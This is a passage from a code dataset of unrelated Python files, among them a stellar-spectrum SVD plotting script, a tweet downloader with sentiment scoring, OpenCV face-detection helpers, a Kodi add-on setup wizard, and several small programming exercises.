matplotlib.use('TkAgg')\n# mpl.style.use('classic')\n\n\n# Fetch the data:\nfetcher = prep_data('SOAP2-1Spot')\n\n# Full spectrum, just 4 phases:\nfull_spec = fetch_full_spec(fetcher)\n\n# Zoomed into the calcium H & K line region, 100 phases:\nca_spec = fetch_ca_spec(fetcher)\n\n\n# We'll use the many-phase zoomed-in spectrum here,\n# aliased so we can swap in other spectra later.\ndynspec = ca_spec\n\n# Compute average spectrum, and an \"image\" of the avg-subtracted \n# spectra (with time as the vertical dimension), rescaled.\navg = dynspec.active.sum(0) / dynspec.nphases\ndelta_image = dynspec.active - avg\nl, u = delta_image.min(), delta_image.max()\nll, lu = dynspec.lambdas[0], dynspec.lambdas[-1]\ndelta_image = (delta_image - l)/(u - l)\n\n\n# Lines in this region of the spectrum:\n# For info on air/vacuum conversion, see:\n# Spectra - SDSS-III\n# http://www.sdss3.org/dr8/spectro/spectra.php\n# Atomic Data for Resonance Absorption Lines... 
- ADS\n# https://ui.adsabs.harvard.edu/abs/1991ApJS...77..119M/abstract\n# Ca II K line, air & vacuum:\nCaK = [3933.663, 3934.777]\n# Ca II H line, air & vacuum:\nCaH = [3968.468, 3969.591]\nlines = CaK + CaH\nlines = (CaK[0], CaH[0]) # air only; appears to be what SOAP uses\n\n\n# Plot the quiet-star spectrum.\nif True:\n fig = figure('quiet-full', figsize=(12,3.5))\n fig.subplots_adjust(left=.1, right=.9, bottom=0.21, top=.9)\n title('Quiet Sun integrated spectrum')\n plot(dynspec.lambdas, dynspec.quiet, label='Integrated spectrum no activity at full resolution')\n xlabel(r'$\\lambda$ ($\\AA$)')\n ylabel('Relative flux')\n for line in lines:\n axvline(line, c='r', lw=.75, alpha=.5)\n # Label vacuum lines:\n text(CaK[0]+.7, 6200, 'Ca II K', horizontalalignment='left',\n verticalalignment='top')\n text(CaH[0]+.7, 6200, 'Ca II H', horizontalalignment='left',\n verticalalignment='top')\n\n\n# Plot spectra at a few phases.\nif False:\n fig = figure('phases', figsize=(12,3.5))\n fig.subplots_adjust(left=.1, right=.9, bottom=0.21, top=.9)\n title('Selected phases')\n for i in range(0, dynspec.nphases, dynspec.nphases//4):\n plot(dynspec.lambdas, dynspec.active[i,:], label='$\\phi = {:0.2f}$'.format(dynspec.phases[i]),\n lw=1, alpha=.5)\n xlabel(r'$\\lambda$ ($\\AA$)')\n ylabel('Relative flux')\n legend()\n for line in lines:\n axvline(line, c='r', lw=.75, alpha=.5)\n\n # Plot mean-subtracted spectra at a few phases.\n fig = figure('diff', figsize=(12,3.5))\n fig.subplots_adjust(left=.1, right=.9, bottom=0.21, top=.9)\n title('Mean-subtracted spectra')\n\n # If there are many phases, plot a subset.\n if dynspec.nphases >= 10:\n step = dynspec.nphases//10\n else:\n step = 1\n\n for i in range(0, dynspec.nphases, step):\n plot(dynspec.lambdas, dynspec.active[i,:] - avg, label='$\\phi = {:0.2f}$'.format(dynspec.phases[i]),\n lw=1.5, alpha=.5)\n xlabel(r'$\\lambda$ ($\\AA$)')\n ylabel('Difference')\n legend()\n for line in lines:\n axvline(line, c='r', lw=.75, alpha=.5)\n\n\n# Try a waterfall-style plot of spectra at a few phases.\nif True:\n fig = figure(figsize=(8, 4))\n # This breaks after mpl-3.6; use add_subplot instead:\n # ax = fig.gca(projection='3d')\n ax = fig.add_subplot(projection='3d')\n\n verts = []\n\n # If there are many phases, plot a subset.\n if dynspec.nphases >= 10:\n step = dynspec.nphases//10\n else:\n step = 1\n\n ind = list(range(0, dynspec.nphases, step))\n zs = dynspec.phases[ind]\n y_l, y_u = 0., 0.\n for i, z in zip(ind, zs):\n # ys = dynspec.active[i,:] - avg\n ys = dynspec.active[i,:]\n y_l = min(y_l, ys.min())\n y_u = max(y_u, ys.max())\n # ys[0], ys[-1] = 0, 0\n verts.append(list(zip(dynspec.lambdas, ys)))\n\n def cc2(arg):\n return mcolors.to_rgba(arg, alpha=0.6)\n\n poly = PolyCollection(verts, facecolors=[cc2('r'), cc2('g'), cc2('b'),\n cc2('y')])\n poly.set_alpha(0.7)\n ax.add_collection3d(poly, zs=zs, zdir='y')\n\n ax.set_xlabel(r'$\\lambda$ ($\\AA$)')\n ax.set_xlim3d(dynspec.lambdas[0], dynspec.lambdas[-1])\n ax.set_ylabel('$\\phi$')\n ax.set_ylim3d(-.5, .5)\n ax.set_zlabel(r'$\\Delta$')\n ax.set_zlim3d(y_l, y_u)\n\n\n# Plot an image of the difference of spectra from the time-averaged spectrum.\n# *** Double-check the origin='lower' setting here (matches use in OuterProduct,\n# which was verified w/ test case).\nif False:\n if True: # larger labels\n rc('axes', labelsize=18)\n rc('xtick.major', pad=8)\n rc('xtick', labelsize=14)\n rc('ytick.major', pad=8)\n rc('ytick', labelsize=14)\n rc('figure.subplot', bottom=.19, top=.925)\n\n # fig = figure('diff-img', 
figsize=(12,5)) # orig size\n fig = figure('diff-img', figsize=(12,3.5)) # shorter for proposal\n imshow(delta_image, cmap=cc.cm.bwy_r, interpolation='nearest', aspect='auto',\n origin='lower', extent=(ll, lu, dynspec.phases[0], dynspec.phases[-1]))\n xlim(ll, lu)\n for line in lines:\n # axvline(line, c='r', lw=.75, alpha=.5)\n axvline(line, c='w', lw=1, alpha=.5)\n xlabel(r'$\\lambda$ ($\\AA$)')\n ylabel(\"Spot rotational phase\")\n title('Difference from time-averaged spectrum')\n\n # Zoomed for inset:\n # fig = figure('diff-img2', figsize=(12,5))\n fig = figure('diff-img2', figsize=(12,3.5))\n imshow(delta_image, cmap=cc.cm.bwy_r, interpolation='nearest', aspect='auto',\n origin='lower', extent=(ll, lu, dynspec.phases[0], dynspec.phases[-1]))\n xlim(ll, lu)\n for line in lines:\n # axvline(line, c='r', lw=.75, alpha=.5)\n axvline(line, c='w', lw=1, alpha=.5)\n xlim(3940., 3947.)\n ylim(-.25, .25)\n # xlabel(r'$\\lambda$ ($\\AA$)')\n #ylabel(\"Spot rotational phase\")\n # title('Difference from time-averaged spectrum')\n\n\n# Test of outer product grid alignment:\nif False:\n spec_x = linspace(1., 5., 5)\n spec_y = array([0., 1., 0., -1., 0.])\n temp_x = linspace(0., 10., 6)\n temp_y = array([-2., -1., 0., 1., 2., 1.])\n outer = OuterProduct(spec_x, spec_y, temp_x, temp_y)\n f5 = outer.plot()\n\n\n# Compute and plot evolving spectral components via SVD.\nif True:\n\n # Compute top 3 singular values and vectors; the largest singular value\n # has index 2 (i.e., they are increasing in s[:]).\n # U[phi,k] contains the phase basis function for singular value # k\n # Vt[k,lambda] contains the wavelength basis function for singular value # k\n U, s, Vt = linalg.svds(delta_image, k=3)\n\n outer = OuterProduct(dynspec.lambdas, Vt[-1,:], dynspec.phases, U[:,-1])\n f1 = outer.plot(lines)\n f1.axes[1].set_title('1st singular value')\n\n outer = OuterProduct(dynspec.lambdas, Vt[-2,:], dynspec.phases, U[:,-2])\n # f2 = outer.plot(lines)\n f2 = outer.plot(lines, zoom=((3959.5, 3965.5), (-.24, .24)))\n f2.axes[1].set_title('2nd singular value')\n\n outer = OuterProduct(dynspec.lambdas, Vt[-3,:], dynspec.phases, U[:,-3])\n # f3 = outer.plot(lines)\n f3 = outer.plot(lines, zoom=((3946.5, 3950.), (-.24, .24)))\n f3.axes[1].set_title('3rd singular value')\n\n # *** DANGER: Changing xlim does not appear to affect the image as expected.\n # Just pass subsets of the data to zoom.\n if False:\n # Zoomed version of SVD3:\n outer = OuterProduct(dynspec.lambdas, Vt[-3,:], dynspec.phases, U[:,-3])\n f4 = outer.plot(lines)\n f4.axes[1].set_title('3rd singular value')\n xrng = (3946.5, 3950.)\n xrng = (3947.25, 3947.9)\n f4.axes[0].set_xlim(*xrng)\n f4.axes[1].set_xlim(*xrng)\n spec = dynspec.active[0,:]\n spec = spec/spec.max()\n l, u = Vt[-3,:].min(), Vt[-3,:].max()\n spec = spec*(u-l) + l\n f4.axes[1].plot(dynspec.lambdas, spec, 'g--', lw=1, alpha=.5)\n f4.axes[0].axvline(3948.05)\n f4.axes[1].axvline(3948.05)\n\n # Zoomed version of SVD3:\n i1, i2 = 7544, 7753 # very narrow region, for checking alignments\n i1, i2 = 7520, 7890\n lambdas = dynspec.lambdas[i1:i2]\n vvals = Vt[-3,i1:i2]\n outer = OuterProduct(lambdas, vvals, dynspec.phases, U[:,-3])\n f5 = outer.plot()\n spec = dynspec.active[0,:]\n spec = spec/spec.max()\n l, u = Vt[-3,:].min(), Vt[-3,:].max()\n # spec = spec*(u-l) + l # v. 
center the spec curve\n        spec = 1.2*u*spec # keep spec curve > 0\n        f5.axes[1].plot(dynspec.lambdas, spec, 'g--', lw=1, alpha=.5)\n        f5.axes[1].axhline(0., ls='-', c='gray', lw=0.75)\n        f5.axes[1].set_title('3rd singular value')\n","repo_name":"tloredo/SOAP2SpotSVDDemo","sub_path":"soap2_svd.py","file_name":"soap2_svd.py","file_ext":"py","file_size_in_byte":9390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}{"seq_id":"39617587360","text":"total = cont = totptous = minor = 0\ncheap = ''\nwhile True:\n    product = str(input('Product name: '))\n    price = float(input('Price: R$'))\n    cont += 1\n    total += price\n    if price > 1000:\n        totptous += 1\n    if cont == 1 or price < minor:\n        minor = price\n        cheap = product\n    res = ''\n    while res not in ('Y', 'N'):\n        res = str(input('Do you want to continue? [Y/N] ')).strip().upper()\n    if res == 'N':\n        break\nprint(f'Total purchase amount: R${total}')\nprint(f'There are {totptous} products over R$1,000.00.')\nprint(f\"The cheapest product is {cheap}, costing R${minor:.2f}\")\n","repo_name":"monteirosamuel74/PythonCV","sub_path":"aula015pararwhile/des070estatistica.py","file_name":"des070estatistica.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}{"seq_id":"10597426202","text":"def main():\n    while True:\n        user = input(\"Fraction: \")\n        result1 = convert(user)\n        result2 = gauge(result1)\n        if result2 is not None:\n            print(result2)\n            break\n\ndef convert(fraction):\n    try:\n        x, y = fraction.split(\"/\")\n        x = int(x)\n        y = int(y)\n        result = x / y\n        result = float(result)\n        return round(result * 100)\n    except ValueError:\n        raise ValueError(\"Invalid fraction format\")\n    except ZeroDivisionError:\n        raise ZeroDivisionError(\"division by zero\")\n\ndef gauge(percentage):\n    if 0 <= percentage < 10:\n        return \"E\"\n    elif 99 <= percentage <= 100:\n        return \"F\"\n    elif 10 <= percentage < 99 :\n        res = round(percentage)\n        return str(f\"{res}%\")\n    else:\n        return None\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Guram12/CS50_Problems","sub_path":"31_test_fuel/fuel.py","file_name":"fuel.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}{"seq_id":"10929022414","text":"# Libraries\nimport tweepy\nfrom tweepy import API\nfrom tweepy import Cursor\nfrom tweepy import OAuthHandler\nimport datetime, time\nfrom twitter_credentials import consumer_key, consumer_secret, access_token, access_token_secret\nimport csv\nfrom textblob import TextBlob\nimport sqlite3\nimport json\n\n#Authenticate Twitter; Return API object. 
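# scipy.sparse.linalg.svds, as used in soap2_svd.py above, returns singular values in
# ascending order, so the dominant component sits at index -1. A self-contained sketch
# of a rank-1 reconstruction check on synthetic data:
import numpy as np
from scipy.sparse import linalg

rng = np.random.default_rng(0)
A = rng.normal(size=(100, 400))
U, s, Vt = linalg.svds(A, k=3)
rank1 = s[-1] * np.outer(U[:, -1], Vt[-1, :])  # top singular triplet as an outer product
print(s)  # ascending: s[-1] is the largest
print(np.linalg.norm(A - rank1) < np.linalg.norm(A))  # removing it shrinks the residual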
\nclass TwitterAuthenticator():\n\n def twitter_auth(self):\n global auth\n global api\n\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = API(auth)\n return api\n\n# Extract input file \nclass FileOps():\n\n def strip_file(self):\n global username\n username = []\n\n with open(\"user_list.txt\", \"r\") as f:\n targets_list = f.readlines()\n\n for i in targets_list:\n username.append(i.strip('\\n'))\n print(username)\n\nclass Tweet():\n\n # Data on the tweet tweet.id_str, tweet.created_at, tweet.text.encode(\"utf-8\"), self.sentiment(tweet.text)\n def __init__(self, tweet_id, text, sentiment):\n self.tweet_id = tweet_id\n # self.created_at = created_at\n self.text = text\n self.sentiment = sentiment\n\n # Inserting that data into the DB\n def insertTweet(self):\n\n c.execute(\"INSERT INTO tweets (tweet_id, text, sentiment) VALUES (?, ?, ?)\",\n (self.tweet_id, self.text, self.sentiment))\n conn.commit()\n\n# Download tweets\nclass PullTweets():\n \n def sentiment(self, text):\n return TextBlob(text).sentiment\n\n def get_tweets(self, screen_name): \n\n print(\"downloading tweets ...\")\n global tweets\n tweets = []\n\n fresh_tweets = api.user_timeline(screen_name, count=5) \n oldest_id = fresh_tweets[-1].id\n\n while len(fresh_tweets) > 0:\n fresh_tweets = api.user_timeline(screen_name, count=5, since_id = oldest_id) \n tweets.extend(fresh_tweets)\n oldest_id = tweets[-1].id\n print(f\"{len(tweets)} tweets downloaded ...\")\n\n out_tweets = [[tweet.id_str, tweet.created_at, tweet.text.encode(\"utf-8\"), self.sentiment(tweet.text)] for tweet in tweets]\n\n for i in tweets:\n tweet = Tweet(str(i.id_str), str(i.text.encode('utf-8')), str(self.sentiment(i.text)))\n tweet.insertTweet()\n\n with open(f'{screen_name} tweets.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow([\"id\",\"created_at\",\"text\",\"sentiment\"])\n writer.writerows(out_tweets)\n\n def all_tweets(self):\n \n for i in username:\n self.get_tweets(i)\n\n\n# Execution \nif __name__ == '__main__':\n\n # Create Table\n conn = sqlite3.connect('twitter.db')\n c = conn.cursor() \n c.execute('''CREATE TABLE tweets\n (tweet_id text,\n text text,\n sentiment text)''')\n conn.commit()\n conn.close()\n\n # Initiate DB\n conn = sqlite3.connect('twitter.db')\n c = conn.cursor()\n\n twitter_authenticator = TwitterAuthenticator()\n twitter_authenticator.twitter_auth()\n\n file_ops = FileOps()\n file_ops.strip_file()\n\n pull_tweets = PullTweets()\n pull_tweets.all_tweets()\n\n\n","repo_name":"jshepp27/MultiPulz","sub_path":"MultiPulz.py","file_name":"MultiPulz.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22500097763","text":"import numpy as np\nimport cv2\nfrom functions import *\n\ndef manual_face_detector(img: np.ndarray) -> list:\n img_copy = img.copy()\n vertex_list = []\n def select_faces(event,x,y,flags,param):\n if event == cv2.EVENT_LBUTTONDOWN:\n vertex_list.append((x,y))\n if(len(vertex_list)%2 == 0):\n a = vertex_list[-2]\n b = vertex_list[-1]\n _ = cv2.rectangle(img_copy,(a[0],a[1]),(b[0],b[1]),(255,0,0),2)\n else:\n _ = cv2.circle(img_copy,(vertex_list[-1][0],vertex_list[-1][1]),1,(255,0,0))\n cv2.namedWindow(\"Face Selection\")\n cv2.setMouseCallback(\"Face Selection\",select_faces)\n while(1):\n cv2.imshow(\"Face Selection\",img_copy)\n k = cv2.waitKey(1)\n if k == 122 and len(vertex_list) != 0:\n vertex_list.pop()\n img_copy = 
img.copy()\n for x,y in zip(vertex_list[0::2],vertex_list[1::2]):\n _ = cv2.rectangle(img_copy,x,y,(255,0,0),2)\n if len(vertex_list)%2 == 1:\n _ = cv2.circle(img_copy,(vertex_list[-1][0],vertex_list[-1][1]),1,(255,0,0))\n continue\n if k != -1:\n break\n cv2.destroyWindow(\"Face Selection\")\n rectangle_list = [(x[0],x[1],y[0]-x[0],y[1]-x[1]) for x,y in zip(vertex_list[0::2],vertex_list[1::2])]\n return rectangle_list\n\ndef viola_jones(img: np.ndarray) -> list:\n face_cascade = cv2.CascadeClassifier('/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces_xywh = face_cascade.detectMultiScale(gray,scaleFactor=1.05,minNeighbors=6,minSize=(30,30))\n return faces_xywh.tolist() if len(faces_xywh) > 0 else []\n\ndef show_detected_face(img: np.ndarray,xywh: list,title=[]) -> None:\n img_copy = []\n for coordinates in xywh:\n img_copy.append(img.copy())\n for (x,y,w,h) in coordinates:\n _ = cv2.rectangle(img_copy[-1],(x,y),(x+w,y+h),(255,0,0),2)\n return show_multiple_img(title,img_copy,0)\n\ndef get_face_roi(img: np.ndarray,xywh: list) -> list:\n face_roi = []\n for i in xywh:\n p_x,p_y,q_x,q_y = get_coordinates(i)\n face_roi.append((i,img[p_y:q_y,p_x:q_x].copy()))\n return face_roi","repo_name":"Simon-zys/COL-783-Assignments","sub_path":"Assignment 1/CAPE/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"12087008321","text":"# Written by Timothy van der Valk. Modelling B.\n\n# Collection of plotting functions for all possible data sets used in the model.\n# Call desired plot_* functions and finally call plot_show to show all the \n# selected plots at once.\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom solver import Solution\n\n\ndef plot_sol_deviation(sol: Solution):\n # Plot bar chart with deviation from target arrival time for each aircraft.\n\n n = sol.data_set.num_aircraft\n xlist = np.arange(n)\n ylist = []\n for i in range(n):\n ylist.append(sol.arrival_times[i] - sol.data_set.target[i]) \n pass\n\n plt.figure(\"Deviation chart\")\n plt.title(\"Deviation from target times of %d aircraft\" % sol.data_set.num_aircraft)\n plt.xlabel(\"Plane ID\")\n plt.ylabel(\"Deviation from target\")\n\n plt.axhline(y=0, c=\"gray\")\n plt.axhline(int(sol.get_deviation()), c=\"red\")\n plt.bar(xlist, ylist, width=0.5)\n\n\ndef plot_sol_events(sol: Solution):\n # Plots the given runway allocation problem by target time and given time.\n\n xlist = sol.arrival_times\n xlist2 = sol.data_set.target\n ylist = [ 0 ] * len(xlist)\n\n plt.figure(\"Event chart\")\n plt.title(\"Arrival and target times of %d aircraft\" % sol.data_set.num_aircraft)\n plt.xlabel(\"Desired (red) and actual (blue) arrival times\")\n\n plt.axhline(y=0, c=\"gray\")\n plt.plot(xlist2, ylist, \"r|\", ms=60, mew=2)\n plt.plot(xlist, ylist, 'bo', ms=7)\n \n # Hide Y axis.\n plt.gca().get_yaxis().set_visible(False)\n\n\ndef plot_sol_intervals(sol: Solution):\n # Plots the given arrival intervals for all aircraft with target and given\n # arrival times. 
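# A minimal driver for the viola_jones detector in face_detection.py above; the image
# path is a hypothetical placeholder, and the haarcascade path is installation-specific:
import cv2

img = cv2.imread("group_photo.jpg")
faces = viola_jones(img)
print("%d face(s): %s" % (len(faces), faces))  # each entry is an (x, y, w, h) box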
This is the largest plot.\n\n target_xlist = []\n target_ylist = []\n given_xlist = []\n \n xlist=[]\n ylist=[]\n n = sol.data_set.num_aircraft\n for i in range(n):\n xlist.append(sol.data_set.earliest[i]) \n xlist.append(sol.data_set.latest[i]) \n xlist.append(None)\n\n yval = i\n ylist.append(yval)\n ylist.append(yval)\n ylist.append(None)\n\n target_xlist.append(sol.data_set.target[i])\n target_ylist.append(yval)\n given_xlist.append(sol.arrival_times[i])\n\n # Plot three different things. Intervals, target and given.\n plt.figure(\"Interval chart\")\n plt.title(\"Arrival windows and arrival times of %d aircraft\" % n)\n plt.ylabel(\"Plane ID\")\n plt.xlabel(\"Timespan\")\n\n plt.plot(xlist, ylist, 'gray')\n plt.plot(target_xlist, target_ylist, 'r^')\n plt.plot(given_xlist, target_ylist, 'go', ms=5)\n\n # Place ID on Y axis for all planes 0, 1, 2, 3 etc.\n plt.yticks(np.arange(0, n))\n\n\ndef plot_show():\n # Show plots to the screen.\n plt.show()\n","repo_name":"parcevval/airplane-math","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34346615592","text":"import xbmcaddon\nimport xbmcgui\nimport xbmc\n\ndialog = xbmcgui.Dialog()\naddon_id = 'plugin.video.sports'\n_addon = xbmcaddon.Addon(id=addon_id)\niLengths = ['1', '2', '3', '4', '5', '10', '15', '30', '60']\nnLengths = ['5', '6', '7', '8', '9', '10', '15', '30']\ndTypes = ['Individual Game Notifications', 'Ticker Notifications']\nnTypes = {'Basketball':{'Upcoming Game':'nba_upcominggame', 'Game Started':'nba_startofgame', 'Lead Change':'nba_leadchange',\n 'Period Change':'nba_periodchange', 'Game Ended':'nba_endofgame'},\n 'Ice Hockey':{'Upcoming Game':'nhl_upcominggame', 'Game Started':'nhl_startofgame', 'Score Change':'nhl_scorechange',\n 'Period Change':'nhl_periodchange', 'Game Ended':'nhl_endofgame'},\n 'Baseball': {'Upcoming Game':'mlb_upcominggame', 'Game Started':'mlb_startofgame', 'Score Change':'mlb_scorechange',\n 'Inning Change':'mlb_inningchange', 'Game Ended':'mlb_endofgame'},\n 'Football': {'Upcoming Game':'nfl_upcominggame', 'Game Started':'nfl_startofgame', 'Score Change':'nfl_scorechange',\n 'Inning Change':'nfl_inningchange', 'Game Ended':'nfl_endofgame'}}\nsports = {'Basketball':'nba_enable', 'Ice Hockey':'nhl_enable', 'Baseball':'mlb_enable', 'Football':'football_enable'}\n\ndef load(first_time):\n if not first_time:\n resetConfirmed = dialog.yesno('Sports Guru', 'Continuing with the set-up will wipe out your existing preferences. [B]Are you sure?[/B]')\n if resetConfirmed:\n try:\n import shutil\n current_settings = xbmc.translatePath('special://userdata/addon_data/plugin.video.sports')\n shutil.rmtree(current_settings)\n xbmc.executebuiltin('Container.Update')\n except:\n pass\n else:\n return\n else:\n _addon.setSetting('firstrun', 'false')\n\n ok = dialog.ok('Sports Guru', 'Welcome to the Sports Guru set-up wizard! Click Ok to begin.')\n if ok:\n wantnotifications = dialog.yesno('Sports Guru', 'Do you want to use the notifications service the add-on offers?')\n if wantnotifications:\n _addon.setSetting('allow', 'true')\n\n ok = dialog.ok('Sports Guru', 'Great! First things first, please select Update Interval.\\n' + \\\n '[B]Note:[/B] It\\'s best to stick with the default 1 minute. 
' + \\\n 'However, shorter intervals may have an adverse effect on low-spec devices (causing lag).')\n howoften = dialog.select('Sports Guru', iLengths)\n if howoften > -1:\n _addon.setSetting('interval', iLengths[howoften])\n ok = dialog.ok('Sports Guru', 'Second, please select the notification format you prefer.')\n whatkind = dialog.select('Sports Guru', dTypes)\n if whatkind > -1:\n ok = dialog.ok('Sports Guru', 'Next please select the notification timeout length.')\n nLength = dialog.select('Sports Guru - Notification Timeout (seconds)', nLengths)\n if whatkind == 0:\n _addon.setSetting('multi', 'false')\n _addon.setSetting('Ntimeout', nLengths[nLength])\n elif whatkind == 1:\n _addon.setSetting('multi', 'true')\n _addon.setSetting('Ttimeout', nLengths[nLength])\n else:\n _addon.setSetting('allow', 'false')\n return\n ok = dialog.ok('Sports Guru', 'Alright, I\\'ve set your update interval to %s minute(s) ' % str(iLengths[howoften]) + \\\n 'and notification preference to %s. Now let\\'s move onto the sports you want notifications for.' % dTypes[whatkind])\n whichsports = dialog.multiselect('Choose your Sports', list(sports.keys()))\n if whichsports is not None:\n for sIndex, key in enumerate(sports.keys()):\n s = list(sports.keys())[sIndex]\n sportId = sports[s]\n if sIndex in whichsports:\n _addon.setSetting(sportId, 'true')\n #Ask what types of notification they want for this sport\n ok = dialog.ok('Sports Guru', 'Please select the notification types you want for %s.' % s)\n whichnotifications = dialog.multiselect('Choose Notification Types', list(nTypes[s].keys()))\n if whichnotifications is not None:\n for nIndex, key in enumerate(nTypes[s].keys()):\n n = list(nTypes[s].keys())[nIndex]\n settingId = nTypes[s][n]\n if nIndex in whichnotifications:\n _addon.setSetting(settingId, 'true')\n else:\n _addon.setSetting(settingId, 'false')\n else:\n _addon.setSetting('allow', 'false')\n return\n\n ok = dialog.ok('Sports Guru', 'Click Ok to select the teams you want notifications for in the [B]%s[/B] League' % sportId.split('_')[0].upper())\n from . import manager\n manager.load(sportId.split('_')[0])\n else:\n _addon.setSetting(sportId, 'false')\n #restart = dialog.ok('Sports Guru', 'Set-up is now complete. 
For your settings to take effect please restart Kodi.')\n else:\n _addon.setSetting('allow', 'false')\n else:\n _addon.setSetting('allow', 'false')\n else:\n _addon.setSetting('allow', 'false')\n else:\n _addon.setSetting('allow', 'false')\n else:\n _addon.setSetting('allow', 'false')\n","repo_name":"skydrome/plugin.video.sports","sub_path":"resources/wizard.py","file_name":"wizard.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"17866150519","text":"def taumBday(b, w, bc, wc, z):\n # Write your code here\n if bc < wc and bc + z < wc:\n wc = bc + z\n elif wc < bc and wc + z < bc:\n bc = wc + z\n\n return b * bc + w * wc\n\n\nif __name__ == '__main__':\n print(taumBday(3, 6, 9, 1, 1))\n","repo_name":"gamez-code/hackerrank_problems","sub_path":"taum_bday/taum_bday.py","file_name":"taum_bday.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"37535094115","text":"num1 = 64\nnum2 = 16\nvarsum = num1 + num2\nvardifference = num1 - num2\nvarproduct = num1 * num2\nvarquotient = num1 / num2\nprint ('The sum is %s' % (varsum))\nprint ('The difference is %s' % (vardifference))\nprint ('The product is %s' % (varproduct))\nprint ('The quotient is %s' % (varquotient))","repo_name":"mturpin1/CodingProjects","sub_path":"Python/aug29.py","file_name":"aug29.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10710696640","text":"from typing import List\n\n\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n using array rotation in reversed method\n \"\"\"\n # def reverse(nums):\n # start = 0\n # end = len(nums) - 1\n # while end > start:\n # nums[end], nums[start] = nums[start], nums[end]\n # start += 1\n # end -= 1\n # return nums\n\n # count = 0\n # previous = None\n # for index in range(len(nums)):\n # if nums[index] == 0:\n # count += 1\n # if count == 1:\n # previous = index\n # continue\n\n # tmp = reverse(nums[previous:index])\n # tmp[0:len(tmp)-count+1] = reverse(tmp[0:len(tmp)-count+1])\n # nums[previous:index] = tmp\n # previous = index - count + 1\n # if previous is not None and nums[previous] == 0 and count > 0:\n # tmp = reverse(nums[previous:index+1])\n # tmp[0:len(tmp)-count] = reverse(tmp[0:len(tmp)-count])\n # nums[previous:index+1] = tmp\n \"\"\"\n Try to be fast using two pointer\n \"\"\"\n count = 0\n for index in range(len(nums)):\n value = nums[index]\n if value == 0:\n count += 1\n continue\n if count and value:\n nums[index-count] = value\n index = len(nums) - 1\n for i in range(count):\n nums[index - i] = 0\n\n print(nums)\n\n\nif __name__ == '__main__':\n test = Solution()\n test.moveZeroes([4, 2, 4, 0, 0, 3, 0, 5, 1, 0])\n","repo_name":"Wanghongkua/Leetcode-Python","sub_path":"Archive/283_Move_Zeroes.py","file_name":"283_Move_Zeroes.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28185076519","text":"#! 
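# The two-pointer idea in 283_Move_Zeroes.py above is usually written as a single swap
# pass; a compact in-place equivalent for comparison:
def move_zeroes(nums):
    write = 0
    for read in range(len(nums)):
        if nums[read] != 0:
            nums[write], nums[read] = nums[read], nums[write]
            write += 1
    return nums

print(move_zeroes([4, 2, 4, 0, 0, 3, 0, 5, 1, 0]))  # [4, 2, 4, 3, 5, 1, 0, 0, 0, 0]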
/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Tom van Steijn, Royal HaskoningDHV\n\nfrom collections import namedtuple\nfrom math import exp\nimport re\n\n\nclass LithologyRule(object):\n    def test(self, rf, qc):\n        raise NotImplementedError('not implemented in base class')\n\n\nclass ExpLithologyRule(LithologyRule):\n    _keys = 'left', 'right', 'a', 'b'\n\n    Limit = namedtuple('Limit', _keys)\n    def __init__(self, lithology, limits):\n        self.lithology = lithology\n        self.limits = [self.Limit(**l) for l in limits]\n\n    def __repr__(self):\n        return ('{s.__class__.__name__:}(lithology={s.lithology:})').format(\n            s=self,\n            )\n\n    def test(self, rf, qc):\n        for limit in self.limits:\n            if (rf > limit.left) and (rf <= limit.right) and qc is not None:\n                return qc > limit.a*exp(limit.b*rf)\n        return False\n\nclass LithologyClassifier(object):\n    def __init__(self, table, ruletype='exponential'):\n        self.default = table['default']\n        self.ruletype = ruletype\n\n        if ruletype == 'exponential':\n            self.rules = [\n                ExpLithologyRule(**r) for r in reversed(table['rules'])\n                ]\n        else:\n            raise ValueError('ruletype \\'{}\\' not supported'.format(ruletype))\n\n    def __repr__(self):\n        return ('{s.__class__.__name__:}(ruletype={s.ruletype:})').format(\n            s=self,\n            )\n\n    def classify(self, rf, qc):\n        lithology = self.default\n        if not ((rf is None) or (rf < 0.)): # when rf is nodata\n            for rule in self.rules:\n                if rule.test(rf, qc):\n                    lithology = rule.lithology\n        return lithology\n\n\nclass SandmedianClassifier(object):\n    Bin = namedtuple('Bin', ['lower', 'upper', 'medianclass'])\n    def __init__(self, bins):\n        self.bins = [self.Bin(**b) for b in bins]\n\n    def classify(self, median):\n        '''get median class using bins'''\n        for bin_ in self.bins:\n            if (median >= bin_.lower) and (median < bin_.upper):\n                return bin_.medianclass\n\n\nclass AdmixClassifier(object):\n    def __init__(self, fieldnames):\n        self.fieldnames = fieldnames\n\n    def classify(self, lithology_admix):\n        attrs = {}\n        if lithology_admix is None:\n            return attrs\n        match = re.match('[A-Z]+', lithology_admix)\n        if match is not None:\n            attrs['lithology'] = 